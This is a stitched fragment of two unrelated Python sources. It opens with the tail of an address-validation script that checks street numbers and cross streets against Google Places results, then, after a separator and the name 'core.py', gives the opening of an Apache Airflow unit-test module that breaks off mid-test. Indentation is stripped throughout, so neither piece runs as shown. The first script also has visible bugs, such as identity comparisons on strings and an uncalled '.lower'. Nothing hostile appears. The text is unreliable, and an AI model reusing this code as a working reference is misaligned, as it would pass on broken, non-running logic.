if (r["street_number"] is not "0") and (
(similarL1(r["street_number"], entry["number"].split("-"))) or
(r["street_number"] == entry["number"]) or
(similarL1(entry["number"], r["street_number"].split("-"))) or
((in_suit(entry["number"], r["street_number"])) or
(in_suit1(r["street_number"], entry["number"])) or
(in_suit3(r["street_number"], entry["number"])))) and \
((is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower())) or \
((street_name.lower() in r["route_name"].lower()) or
(similarL(r["route_name"].lower(), cross_street_list, 0.7)) or (
similarL1a(r["route_name"].lower(), cross_street_list)))):
if is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower()) and \
((is_cross_street(r["route_name"].lower(), street_name.lower(),
city_name.lower())) is False) and \
((street_name.lower() not in r["route_name"].lower())):
cross_street_list.add(r["route_name"])
cross_street_count += 1
count_found = 0
for c in cross_streets:
if c["street_id"] in shop["street_id"]:
for x in c["cross_streets"]:
if r["route_name"].lower in x["name"].lower():
count_found += 1
if count_found < 1:
c["cross_streets"].extend([{"cross_street_id": uuid.uuid4().__str__(),
"name": r["route_name"].lower()}])
business["building"].extend({r["google_place_id"]})
business_count += 1
elif (r["street_number"] is not "0") and (
(is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower())) or \
((street_name.lower() in r["route_name"].lower()) or
(similarL(r["route_name"].lower(), cross_street_list, 0.7))) or (
similarL1a(r["route_name"].lower(), cross_street_list))):
if is_cross_street(r["route_name"].lower(), street_name.lower(), city_name.lower()) and \
((is_cross_street(r["route_name"].lower(), street_name.lower(),
city_name.lower())) is False) and \
((street_name.lower() not in r["route_name"].lower())):
cross_street_list.add(r["route_name"])
cross_street_count += 1
count_found = 0
for c in cross_streets:
if c["street_id"] in shop["street_id"]:
for x in c["cross_streets"]:
if r["route_name"].lower in x["name"].lower():
count_found += 1
if count_found < 1:
c["cross_streets"].extend([{"cross_street_id": uuid.uuid4().__str__(),
"name": r["route_name"].lower()}])
business["building"].extend({r["google_place_id"]})
business_count += 1
not_valid["building"].extend({entry["number"]})
not_valid_count += 1
incorrect["building"].extend({entry["number"]})
incorrect_count += 1
if business_count > 0: businesses += [business]
if not_valid_count > 0: not_valids += [not_valid]
if incorrect_count > 0: incorrects += [incorrect]
for valid in valids:
if shop["street_id"] == valid["street_id"]:
valid["Address_Validator"] = True
print("\n ---------------------Valid business from the source files--------------------------------------------------")
if len(businesses):
print(json.dumps(businesses, ensure_ascii=False, indent=4))
else:
print("\n No Valid Business Found")
print("\n --------------------------Incorrect Street Numbers--------------------------------------------------------")
if len(incorrects):
print(json.dumps(incorrects, ensure_ascii=False, indent=4))
else:
print("\n No Incorrect Addresses Found")
# ------------------CORRECT MISSING ADDRESS NAMES----------------------------------------------
for inc in incorrects:
street_name = get_street_name(inc["street_id"])
city_name = get_city_name(inc["city_id"])
business1 = {"street_id": inc["street_id"], "building": []}
business1_count = 0
for entry in inc["building"]:
valid_address = get_valid_business(entry, street_name, city_name)
if valid_address:
business1["building"].extend({valid_address})
business1_count += 1
if business1_count > 0: businesses1 += [business1]
if (len(businesses1) > 0):
print(
"\n --------------------------Corrected Businesses fetched--------------------------------------------------------")
print(json.dumps(businesses1, ensure_ascii=False, indent=4))
# regrouping all businesses
for street in businesses:
for street1 in businesses1:
if street1["street_id"] == street["street_id"]:
street["building"] = street["building"] + street1["building"]
################## WRITUNG IN JSON FILE ######################
# write to Valid_address.json
if os.stat(business_address_path).st_size == 0:
with open(business_address_path, 'a') as outfile:
json.dump(businesses, outfile, ensure_ascii=False, indent=2)
outfile.close()
else:
with open(business_address_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
businesses1 = businesses
potential_matchjson_d = json.load(outfile)
for street in potential_matchjson_d:
for street1 in businesses:
if street1["street_id"] == street["street_id"]:
street["building"] = street["building"] + street1["building"]
businesses1.remove(street1)
outfile.truncate(0)
if len(businesses1) > 0: potential_matchjson_d.extend(businesses1)
json.dump(potential_matchjson_d, outfile, ensure_ascii=False, indent=2)
outfile.close()
# write in cross streets
if cross_street_count > 0:
if os.stat(input_filename1).st_size == 0 and cross_streets.__len__() > 0:
with open(input_filename1, 'a+') as outfile:
json.dump(cross_streets, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(input_filename1, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
cross_streets1 = cross_streets
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in cross_streets:
if street1["street_id"] == street["street_id"]:
street["cross_streets"] = street1["cross_streets"]
cross_streets1.remove(street1)
if len(cross_streets1) > 0: matchjson_d.extend(cross_streets1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
# write to validated_streets.json
# tracking which street was already validated to ensure a better use of the Google APIs.
if os.stat(validated_streets_path).st_size == 0:
with open(validated_streets_path, 'a+') as outfile:
json.dump(valids, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(validated_streets_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
outfile.truncate(0)
json.dump(valids, outfile, ensure_ascii=False, indent=4)
outfile.close()
done = True
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
configuration.conf.load_test_config()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
